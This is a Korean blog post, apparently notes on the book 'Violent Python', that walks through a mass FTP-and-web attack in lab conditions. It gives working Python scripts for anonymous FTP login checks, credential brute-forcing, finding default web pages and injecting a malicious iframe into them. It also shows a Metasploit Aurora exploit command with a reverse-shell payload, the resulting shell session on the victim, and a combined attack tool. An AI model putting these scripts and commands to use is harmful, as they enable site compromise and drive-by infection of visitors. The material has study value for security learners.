\n\uc5f0\uad6c\ubaa9\uc801\uc73c\ub85c \uc0ac\uc6a9\ud558\uc9c0 \uc54a\uace0 \uc545\uc758\uc801\uc778 \ubaa9\uc801\uc73c\ub85c \uc774\uc6a9\ud560 \uacbd\uc6b0 \ubc1c\uc0dd\ud560 \uc218 \uc788\ub294 \ubc95\uc801\uc740 \ucc45\uc784\uc740 \ubaa8\ub450 \ubcf8\uc778\uc5d0\uac8c \uc788\uc2b5\ub2c8\ub2e4.
\n<\/strong><\/p>\n
\ud574\ucee4\uc758 \uc5b8\uc5b4, \uce58\uba85\uc801 \ud30c\uc774\uc36c – CHAPTER 1 \uc18c\uac1c<\/a> 2.4 FTP\uc640 \uc6f9\uc744 \uc774\uc6a9\ud55c \ub300\uaddc\ubaa8 \uacf5\uaca9 2.4.1 \ud30c\uc774\uc36c\uc73c\ub85c \uc775\uba85 FTP \uc2a4\uce90\ub108 \ub9cc\ub4e4\uae30 \uc2e4\ud589\uacb0\uacfc(\ud14c\uc2a4\ud2b8\ub97c \uc704\ud574 \ub300\uc0c1\uc11c\ubc84\uc5d0 Anonymous \ub85c\uadf8\uc778\uc744 \ud5c8\uc6a9)<\/p>\n 2.4.2 Ftplib\ub85c FTP \uc0ac\uc6a9\uc790 \uc778\uc99d\uc815\ubcf4 \uacf5\uaca9\ud558\uae30 \uc2e4\ud589\uacb0\uacfc(\ud14c\uc2a4\ud2b8\ub97c \uc704\ud574 \ub300\uc0c1\uc11c\ubc84\uc5d0 root \uacc4\uc815\uc744 \ucd94\uac00)<\/p>\n 2.4.3 FTP \uc11c\ubc84\uc5d0 \uc788\ub294 \uc6f9 \ud398\uc774\uc9c0 \uac80\uc0c9\ud558\uae30 \uc2e4\ud589\uacb0\uacfc((\ud14c\uc2a4\ud2b8\ub97c \uc704\ud574 \ub300\uc0c1\uc11c\ubc84\uc5d0 test.html, test.php \ud30c\uc77c \uc0dd\uc131)<\/p>\n 2.4.4 \uc6f9 \ud398\uc774\uc9c0\uc5d0 \uc545\uc131\ucf54\ub4dc \uc0bd\uc785\ud558\uae30 \uc704\uc640 \uac19\uc774 warning \uc774 \ubc1c\uc0dd\ud560 \uacbd\uc6b0, \ub2e4\uc2dc \uc2e4\ud589.<\/p>\n – \uc774\uc81c \uc545\uc131\ucf54\ub4dc\ub97c \ud398\uc774\uc9c0\uc5d0 \uc2ec\uc5b4\ubcf4\uc790<\/p>\n \uc774\uc81c \uc545\uc131\ucf54\ub4dc\uac00 \uc0bd\uc785\ub41c \ud398\uc774\uc9c0\uc5d0 \uc0ac\uc6a9\uc790\ub4e4\uc774 \uc811\uc18d\ud558\uba74, \ucde8\uc57d\ud55c \uc2dc\uc2a4\ud15c\uc774\ub77c\uba74, \ud574\ucee4\uac00 \uc811\uc18d\ud55c \uc0ac\uc6a9\uc790\ub4e4\uc758 PC\uc5d0 \uc811\uadfc\ud560 \uc218 \uc788\ub2e4.<\/p>\n 2.4.5 \ubaa8\ub4e0 \uacf5\uaca9 \ud1b5\ud569\ud558\uae30 <\/p>\n","protected":false},"excerpt":{"rendered":" Notice : \ud574\ub2f9 \uc790\ub8cc\uac00 \uc800\uc791\uad8c\ub4f1\uc5d0 \uc758\ud574\uc11c \ubb38\uc81c\uac00 \uc788\ub2e4\uba74 \ubc14\ub85c \uc0ad\uc81c\ud558\uaca0\uc2b5\ub2c8\ub2e4. \uc5f0\uad6c\ubaa9\uc801\uc73c\ub85c \uc0ac\uc6a9\ud558\uc9c0 \uc54a\uace0 \uc545\uc758\uc801\uc778 \ubaa9\uc801\uc73c\ub85c \uc774\uc6a9\ud560 \uacbd\uc6b0 \ubc1c\uc0dd\ud560 \uc218 \uc788\ub294 \ubc95\uc801\uc740 \ucc45\uc784\uc740 \ubaa8\ub450 \ubcf8\uc778\uc5d0\uac8c \uc788\uc2b5\ub2c8\ub2e4. [\uad6c\ub9e4\ud558\uae30] \ud574\ucee4\uc758 \uc5b8\uc5b4, \uce58\uba85\uc801 \ud30c\uc774\uc36c – CHAPTER 1 \uc18c\uac1c \ud574\ucee4\uc758 \uc5b8\uc5b4, \uce58\uba85\uc801 \ud30c\uc774\uc36c – … Continue reading ![\"VIOLENT_PYTHON_S\"](\"http:\/\/apollo89.com\/wordpress\/wp-content\/uploads\/2013\/03\/VIOLENT_PYTHON_S.jpg\")
<\/a>
\n[\uad6c\ub9e4\ud558\uae30]<\/a><\/p>\n
\n\ud574\ucee4\uc758 \uc5b8\uc5b4, \uce58\uba85\uc801 \ud30c\uc774\uc36c – CHAPTER 2 \uce68\ud22c \ud14c\uc2a4\ud2b8 – \ud3ec\ud2b8 \uc2a4\uce90\ub108 \ub9cc\ub4e4\uae30<\/a>
\n\ud574\ucee4\uc758 \uc5b8\uc5b4, \uce58\uba85\uc801 \ud30c\uc774\uc36c – CHAPTER 2 \uce68\ud22c \ud14c\uc2a4\ud2b8 – SSH \ubd07\ub137 \uad6c\ucd95\ud558\uae30<\/a>
\n\ud574\ucee4\uc758 \uc5b8\uc5b4, \uce58\uba85\uc801 \ud30c\uc774\uc36c – CHAPTER 2 \uce68\ud22c \ud14c\uc2a4\ud2b8 – FTP\uc640 \uc6f9\uc744 \uc774\uc6a9\ud55c \ub300\uaddc\ubaa8 \uacf5\uaca9<\/a>
\n\ud574\ucee4\uc758 \uc5b8\uc5b4, \uce58\uba85\uc801 \ud30c\uc774\uc36c – CHAPTER 2 \uce68\ud22c \ud14c\uc2a4\ud2b8 – \ucee8\ud53c\ucee4 \ub178\ub825\ud558\uba74 \ub41c\ub2e4<\/a><\/p>\n
\n– k985ytv \ub300\uaddc\ubaa8 \ud574\ud0b9\uacf5\uaca9 : \uc775\uba85ftp\uc640 \ud0c8\ucde8\ud55c ftp \uacc4\uc815\uc73c\ub85c 22,400\uac1c\uc758 \ub3c4\uba54\uc778\uc758 536,000\uac1c\uc758 \ud398\uc774\uc9c0\uc5d0 \ub300\ud55c \uc811\uadfc\uad8c\ud55c \ud68d\ub4dd \ud6c4 \ud398\uc774\uc9c0\uc5d0 \ub9ac\ub2e4\uc774\ub809\uc158 \ucf54\ub4dc\ub97c \uc0bd\uc785\ud558\uc5ec \ubc29\ubb38\uc790\uac00 \uc811\uc18d\ud558\uba74 \uc2e0\uc6a9\uce74\ub4dc \uc815\ubcf4\ub97c \ud0c8\ucde8\ud558\ub294 \uac00\uc9dc \ubc31\uc2e0 \uc124\uce58\ud558\ub3c4\ub85d \ud568<\/p>\n
\n– \ud30c\uc774\uc36c\uc758 ftplib\uc73c\ub85c \ud2b9\uc815 \uc11c\ubc84\uac00 \uc775\uba85 \ub85c\uadf8\uc778\uc744 \ud5c8\uc6a9\ud558\ub294\uc9c0 \ud310\ub2e8\ud558\ub294 \uc2a4\ud06c\ub9bd\ud2b8<\/p>\n#!\/usr\/bin\/python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport ftplib\r\n\r\ndef anonLogin(hostname):\r\n try:\r\n ftp = ftplib.FTP(hostname)\r\n ftp.login('anonymous', 'me@your.com')\r\n print '\\n[*] ' + str(hostname) +\\\r\n ' FTP Anonymous Logon Succeeded.'\r\n ftp.quit()\r\n return True\r\n except Exception, e:\r\n print '\\n[-] ' + str(hostname) +\\\r\n\t ' FTP Anonymous Logon Failed.'\r\n\treturn False\r\n\r\n\r\nhost = '192.168.110.129'\r\nanonLogin(host)<\/pre>\n# python anonLogin.py\r\n\r\n[*] 192.168.110.129 FTP Anonymous Logon Succeeded.\r\n<\/pre>\n
\n– brute force \uacf5\uaca9\uc73c\ub85c \uc778\uc99d\uc815\ubcf4 \ud68d\ub4dd\ud558\uae30.<\/p>\n#!\/usr\/bin\/python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport ftplib, time\r\n\r\ndef bruteLogin(hostname, passwdFile):\r\n pF = open(passwdFile, 'r')\r\n for line in pF.readlines():\r\n\ttime.sleep(1)\r\n userName = line.split(':')[0]\r\n passWord = line.split(':')[1].strip('\\r').strip('\\n')\r\n\tprint \"[+] Trying: \"+userName+\"\/\"+passWord\r\n try:\r\n ftp = ftplib.FTP(hostname)\r\n ftp.login(userName, passWord)\r\n print '\\n[*] ' + str(hostname) +\\\r\n\t ' FTP Logon Succeeded: '+userName+\"\/\"+passWord\r\n ftp.quit()\r\n return (userName, passWord)\r\n except Exception, e:\r\n pass\r\n print '\\n[-] Could not brute force FTP credentials.'\r\n return (None, None)\r\n\r\n\r\nhost = '192.168.110.129'\r\npasswdFile = 'userpass.txt'\r\nbruteLogin(host, passwdFile)<\/pre>\n# python bruteLogin.py \r\n[+] Trying: administrator\/password\r\n[+] Trying: admin\/12345\r\n[+] Trying: root\/secret\r\n[+] Trying: guest\/guest\r\n[+] Trying: root\/toor\r\n\r\n[*] 192.168.110.129 FTP Logon Succeeded: root\/toor<\/pre>\n
\n– FTP\uc11c\ubc84\uc5d0 \uc811\uc18d\ud574 \ucee8\ud150\uce20\ub97c \uc5f4\uac70(NLST)\ud558\uace0, \ub514\ud3f4\ud2b8 \ud398\uc774\uc9c0\ub97c \ucc3e\uc74c<\/p>\n#!\/usr\/bin\/python\r\n# -*- coding: utf-8 -*-\r\nimport ftplib\r\n\r\ndef returnDefault(ftp):\r\n try:\r\n dirList = ftp.nlst()\r\n except:\r\n dirList = []\r\n print '[-] Could not list directory contents.'\r\n print '[-] Skipping To Next Target.'\r\n return\r\n\r\n retList = []\r\n for fileName in dirList:\r\n fn = fileName.lower()\r\n if '.php' in fn or '.htm' in fn or '.asp' in fn:\r\n print '[+] Found default page: ' + fileName\r\n retList.append(fileName)\r\n return retList\r\n\r\nhost = '192.168.110.129'\r\nuserName = 'root'\r\npassWord = 'toor'\r\nftp = ftplib.FTP(host)\r\nftp.login(userName, passWord)\r\nreturnDefault(ftp)<\/pre>\n
# python defaultPages.py\r\n[+] Found default page: test.html\r\n[+] Found default page: test.php<\/pre>\n
\n– \uc6f9\ud398\uc774\uc9c0\ub97c \ubcc0\uc870\ud558\uae30\uc5d0 \uc55e\uc11c, \uc545\uc131\uc11c\ubc84\uc640 \uc545\uc131\ud398\uc774\uc9c0\ub97c \ub9cc\ub4e0\ub2e4. (\uba54\ud0c0\uc2a4\ud50c\ub85c\uc787\uc758 \uc624\ub85c\ub77c \ucde8\uc57d\uc810 \uc774\uc6a9 – ms10_002_aurora)
\n– \ucde8\uc57d\uc810\uc758 \uc815\ubcf4 \ubc0f \ucde8\uc57d\uc2dc\uc2a4\ud15c\uc740 \uc544\ub798\uc758 \ub9c1\ud06c\uc5d0\uc11c \ud655\uc778\ud560\uc218 \uc788\ub2e4.
\nhttp:\/\/technet.microsoft.com\/ko-kr\/security\/bulletin\/ms10-002#EED<\/a><\/p>\n# msfcli exploit\/windows\/browser\/ms10_002_aurora LHOST=192.168.110.133 SRVHOST=192.168.110.133 URIPATH=\/key PAYLOAD=windows\/shell\/reverse_tcp LPORT=443 E\r\n[*] Please wait while we load the module tree...\r\nWarning: The following modules could not be loaded!\r\n\r\n\t\/opt\/metasploit\/msf3\/modules\/post\/multi\/gather\/ssh_creds.rb: NameError uninitialized constant Msf::Post::Unix\r\n\r\n[-] WARNING! The following modules could not be loaded!\r\n[-] \t\/opt\/metasploit\/msf3\/modules\/post\/multi\/gather\/ssh_creds.rb: NameError uninitialized constant Msf::Post::Unix\r\n...\r\n<\/pre>\n
\n\/opt\/metasploit\/msf3\/modules\/post\/multi\/gather\/ssh_creds.rb \ud30c\uc77c \uc218\uc815\ud558\uba74\ub41c\ub2e4.
\nrequire ‘msf\/core\/post\/unix’ \ucd94\uac00
\n\ucc38\uace0 : http:\/\/www.sinkblog.org\/archives\/103.html<\/a><\/p>\n# msfcli exploit\/windows\/browser\/ms10_002_aurora LHOST=192.168.110.133 SRVHOST=192.168.110.133 URIPATH=\/key PAYLOAD=windows\/shell\/reverse_tcp LPORT=443 E\r\n[*] Please wait while we load the module tree...\r\n\r\n , ,\r\n \/ \\\r\n ((__---,,,---__))\r\n (_) O O (_)_________\r\n \\ _ \/ |\\\r\n o_o \\ M S F | \\\r\n \\ _____ | *\r\n ||| WW|||\r\n ||| |||\r\n\r\n\r\n =[ metasploit v4.5.0-dev [core:4.5 api:1.0]\r\n+ -- --=[ 927 exploits - 499 auxiliary - 151 post\r\n+ -- --=[ 251 payloads - 28 encoders - 8 nops\r\n\r\nLHOST => 192.168.110.133\r\nSRVHOST => 192.168.110.133\r\nURIPATH => \/key\r\nPAYLOAD => windows\/shell\/reverse_tcp\r\nLPORT => 443\r\n[*] Exploit running as background job.\r\n\r\n[*] Started reverse handler on 192.168.110.133:443 \r\n[*] Using URL: http:\/\/192.168.110.133:8080\/key\r\n[*] Server started.\r\nmsf exploit(ms10_002_aurora) > <\/pre>\n
#!\/usr\/bin\/python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport ftplib\r\n\r\ndef injectPage(ftp, page, redirect):\r\n f = open(page + '.tmp', 'w')\r\n ftp.retrlines('RETR ' + page, f.write)\r\n print '[+] Downloaded Page: ' + page\r\n\r\n f.write(redirect)\r\n f.close()\r\n print '[+] Injected Malicious IFrame on: ' + page\r\n\r\n ftp.storlines('STOR ' + page, open(page + '.tmp'))\r\n print '[+] Uploaded Injected Page: ' + page\r\n\r\nhost = '192.168.95.179'\r\nuserName = 'guest'\r\npassWord = 'guest'\r\nftp = ftplib.FTP(host)\r\nftp.login(userName, passWord)\r\nredirect = '<iframe src='+\\\r\n '\"http:\\\\\\\\192.168.110.133:443\\\\key\"><\/iframe>'\r\ninjectPage(ftp, 'test.html', redirect)\r\n\r\n<\/pre>\nmsf exploit(ms10_002_aurora) > \r\n[*] 192.168.110.129 ms10_002_aurora - Sending Internet Explorer \"Aurora\" Memory Corruption\r\n[*] Sending stage (240 bytes) to 192.168.110.129\r\n\r\nmsf exploit(ms10_002_aurora) > sessions\r\n\r\nActive sessions\r\n===============\r\n\r\n Id Type Information Connection\r\n -- ---- ----------- ----------\r\n 1 shell windows Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft ... 192.168.110.133:443 -> 192.168.110.129:1129 (192.168.110.129)\r\n\r\nmsf exploit(ms10_002_aurora) >\r\nmsf exploit(ms10_002_aurora) > sessions -i 1\r\n[*] Starting interaction with 1...\r\n\r\nMicrosoft Windows 2000 [Version 5.00.2195]\r\n(C) Copyright 1985-2000 Microsoft Corp.\r\n\r\nC:\\Documents and Settings\\Administrator\\???? ???>\r\nC:\\Documents and Settings\\Administrator\\???? ???>ECHO %USERNAME%\r\nECHO %USERNAME%\r\nAdministrator<\/pre>\n
\n– \uc55e\uc758 \uacfc\uc815\uc744 \ud1b5\ud569<\/p>\n#!\/usr\/bin\/python\r\n# -*- coding: utf-8 -*-\r\nimport ftplib\r\nimport optparse\r\nimport time\r\n\r\ndef anonLogin(hostname):\r\n try:\r\n ftp = ftplib.FTP(hostname)\r\n ftp.login('anonymous', 'me@your.com')\r\n print '\\n[*] ' + str(hostname) \\\r\n + ' FTP Anonymous Logon Succeeded.'\r\n ftp.quit()\r\n return True\r\n except Exception, e:\r\n print '\\n[-] ' + str(hostname) +\\\r\n ' FTP Anonymous Logon Failed.'\r\n return False\r\n\r\ndef bruteLogin(hostname, passwdFile):\r\n pF = open(passwdFile, 'r')\r\n for line in pF.readlines():\r\n time.sleep(1)\r\n userName = line.split(':')[0]\r\n passWord = line.split(':')[1].strip('\\r').strip('\\n')\r\n print '[+] Trying: ' + userName + '\/' + passWord\r\n try:\r\n ftp = ftplib.FTP(hostname)\r\n ftp.login(userName, passWord)\r\n print '\\n[*] ' + str(hostname) +\\\r\n ' FTP Logon Succeeded: '+userName+'\/'+passWord\r\n ftp.quit()\r\n return (userName, passWord)\r\n except Exception, e:\r\n pass\r\n print '\\n[-] Could not brute force FTP credentials.'\r\n return (None, None)\r\n\r\ndef returnDefault(ftp):\r\n try:\r\n dirList = ftp.nlst()\r\n except:\r\n dirList = []\r\n print '[-] Could not list directory contents.'\r\n print '[-] Skipping To Next Target.'\r\n return\r\n\r\n retList = []\r\n for fileName in dirList:\r\n fn = fileName.lower()\r\n if '.php' in fn or '.htm' in fn or '.asp' in fn:\r\n print '[+] Found default page: ' + fileName\r\n retList.append(fileName)\r\n return retList\r\n\r\ndef injectPage(ftp, page, redirect):\r\n f = open(page + '.tmp', 'w')\r\n ftp.retrlines('RETR ' + page, f.write)\r\n print '[+] Downloaded Page: ' + page\r\n\r\n f.write(redirect)\r\n f.close()\r\n print '[+] Injected Malicious IFrame on: ' + page\r\n\r\n ftp.storlines('STOR ' + page, open(page + '.tmp'))\r\n print '[+] Uploaded Injected Page: ' + page\r\n\r\ndef attack(username,password,tgtHost,redirect):\r\n ftp = ftplib.FTP(tgtHost)\r\n ftp.login(username, password)\r\n defPages = returnDefault(ftp)\r\n for defPage in defPages:\r\n injectPage(ftp, defPage, redirect)\r\n\r\ndef main():\r\n parser = optparse.OptionParser('usage %prog '+\\\r\n '-H <target host[s]> -r <redirect page>'+\\\r\n '[-f <userpass file>]')\r\n \r\n parser.add_option('-H', dest='tgtHosts',\\\r\n type='string', help='specify target host')\r\n parser.add_option('-f', dest='passwdFile',\\\r\n type='string', help='specify user\/password file')\r\n parser.add_option('-r', dest='redirect',\\\r\n type='string',help='specify a redirection page')\r\n\r\n (options, args) = parser.parse_args()\r\n tgtHosts = str(options.tgtHosts).split(',')\r\n passwdFile = options.passwdFile\r\n redirect = options.redirect\r\n\r\n if tgtHosts == None or redirect == None:\r\n print parser.usage\r\n exit(0)\r\n\r\n for tgtHost in tgtHosts:\r\n username = None\r\n password = None\r\n\r\n if anonLogin(tgtHost) == True:\r\n username = 'anonymous'\r\n password = 'me@your.com'\r\n print '[+] Using Anonymous Creds to attack'\r\n attack(username, password, tgtHost, redirect)\r\n \r\n elif passwdFile != None:\r\n (username, password) =\\\r\n bruteLogin(tgtHost, passwdFile)\r\n if password != None:\r\n '[+] Using Creds: ' +\\\r\n username + '\/' + password + ' to attack'\r\n attack(username, password, tgtHost, redirect)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n<\/pre>\n